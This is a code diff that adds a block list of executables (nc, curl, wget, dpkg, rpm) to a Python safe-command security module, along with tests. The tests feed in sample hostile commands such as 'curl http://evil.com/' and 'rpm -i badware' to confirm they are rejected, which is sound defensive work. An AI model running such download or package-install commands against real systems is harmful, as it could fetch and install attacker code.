implement banned exc

Author: clavedeluna

src/security/safe_command/api.py

@@ -19,6 +19,8 @@
     )
 )
 
+BANNED_EXECUTABLES = frozenset(("nc", "curl", "wget", "dpkg", "rpm"))
+
 
 def run(original_func, command, *args, restrictions=DEFAULT_CHECKS, **kwargs):
     check(command, restrictions)
@@ -49,6 +51,9 @@ def check(command, restrictions):
     if "PREVENT_COMMAND_CHAINING" in restrictions:
         check_multiple_commands(command)
 
+    if "PREVENT_COMMON_EXPLOIT_EXECUTABLES" in restrictions:
+        check_banned_executable(parsed_command)
+
 
 def check_sensitive_files(parsed_command: list):
     for cmd in parsed_command:
@@ -67,3 +72,8 @@ def check_multiple_commands(command: str):
     if isinstance(command, list):
         if any(cmd in separators for cmd in command):
             raise SecurityException("Multiple commands not allowed: %s", command)
+
+
+def check_banned_executable(parsed_command: list):
+    if any(cmd in BANNED_EXECUTABLES for cmd in parsed_command):
+        raise SecurityException("Disallowed command: %s", parsed_command)

tests/safe_command/test_api.py

@@ -69,3 +69,16 @@ def test_blocks_command_chaining(self, command, original_func):
         with pytest.raises(SecurityException) as err:
             safe_command.run(original_func, command)
         assert err.value.args[0] == "Multiple commands not allowed: %s"
+
+    @pytest.mark.parametrize(
+        "command",
+        ["rpm -i badware", "curl http://evil.com/", "wget http://evil.com/"],
+    )
+    def test_blocks_banned_exc(self, command, original_func):
+        with pytest.raises(SecurityException) as err:
+            safe_command.run(
+                original_func,
+                command,
+                restrictions=["PREVENT_COMMON_EXPLOIT_EXECUTABLES"],
+            )
+        assert err.value.args[0] == "Disallowed command: %s"